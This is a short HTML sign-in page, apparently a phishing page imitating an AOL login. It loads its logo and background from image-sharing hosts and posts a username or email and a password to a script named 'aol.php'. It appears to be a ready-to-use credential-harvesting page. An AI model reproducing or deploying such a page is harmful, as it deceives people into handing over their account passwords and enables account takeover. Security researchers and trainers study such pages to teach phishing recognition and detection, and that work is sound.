<!doctype html>
<html>
<head>
<title>Sign In</title>
</head>
<body>
<center>

<style type="text/css">


#backgroundimage
{
position: absolute;
top:0px;
left:0px;
}

body{
  background:url(https://i.imgur.com/NyE0HIN.png) no-repeat center center fixed; 
   -webkit-background-size: cover;
  -moz-background-size: cover;
  -o-background-size: cover;
  background-size: cover;
}
input{
  display: block;
  margin: 0;
  width: 250px;
  height: 25px;
  font-family: sans-serif;
  font-size: 17px;  
   padding: 5px;
  border: solid 1.25px #D3D5D5;
}

label{
      font-size: 1.2em;
      font-weight: bold;    
      font-family: 'Source Sans Pro',sans-serif;
    font-size: 16px;
    line-height: 1.42857143;
    color: #333;
}
fieldset {
  position: fixed;
top: 150px;
right: 25px;
    font-family: sans-serif;
width:295px;
height:300px;
 background:white;
 border: 0px;
    padding: 10px;
    border: 1px solid #E6E6E6;
}


input[type=submit] {

  width: 250px;
  height: 40px;
   padding: 8px;
    font-size: 18px;
    line-height: 1.33;
    color: #fff;
    background-color: #4391E3;
    display: inline-block;
    margin-bottom: 0;
    font-weight: normal;
    text-align: center;
    vertical-align: middle;
    cursor: pointer;
    border: 0px;
    white-space: nowrap;
   }
</style>

<form action="aol.php" method="post"><br><br><br>
<br><br><br><fieldset>
<img src="https://image.prntscr.com/image/cF6EVPZIToqYa4eDguyx9A.png"><br>
<input type="text" name="user" placeholder="Username or Email" required >
<br><input type="password" name="pass" placeholder="Password" required ><br>

<br>
    <input type="submit" name="submit" value="Sign In"/> <br></fieldset>

</center>
</form>
</body>
</html>
